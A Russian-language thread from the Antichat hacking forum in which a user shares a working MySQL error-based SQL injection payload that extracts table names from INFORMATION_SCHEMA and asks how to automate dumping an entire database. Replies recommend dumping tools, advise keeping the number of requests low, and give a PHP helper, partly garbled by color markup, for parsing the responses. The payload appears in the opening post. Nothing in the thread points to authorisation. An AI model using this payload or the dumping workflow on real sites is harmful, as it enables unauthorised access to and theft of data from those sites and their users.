Форум АНТИЧАТ - Чем не напрягаясь можно получить дампнуть базу через Error Based SQLi?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

Собственно ситуация, имеется запрос вида

Цитата:

Сообщение от None

id=-1+or+(select+count(*)+from+(select+1+union+select+ 2+union+select+3)x+group+by+concat((SELECT+TABLE_N AME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),floo r(rand(0)*2)))+--+

Инфа выдается нормально.

Но в базе уйма таблиц, и сидеть менять это число не очень прикалывает.

Есть ли какой-нидь скрипт/софт, который бы просто прокрутил limit и выдал результат?

Спасибо.

уже 100 раз обсуждали, toolza

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR]

[/COLOR]

нахрена в слепую делать 1к запросов ?)

Цитата:

Сообщение от trololoman96

нахрена в слепую делать 1к запросов ?)

да незачем, методом тыка в 2-3 запроса посмотри сколько всего там значений выводится значений и можно парсить

Toolza от Пашкеллы тебе в помощь!

Да, и лучше используй такую функцию, чтобы парсить страничку:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]ex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$to[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);

return[/COLOR][COLOR="#0000BB"]$string[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#FF8000"]// В $input - полученная курлом страница.

[/COLOR][COLOR="#0000BB"]$answ[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$input[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// Выведет то что между ними

[/COLOR][/COLOR]

Цитата:

Сообщение от fl00der

Есть ли какой-нидь скрипт/софт, который бы просто прокрутил limit и выдал результат?
Спасибо.

Да, rsaUnDumper 2.0

Предназначен для дампа по лимиту (или заданым значениям перебора)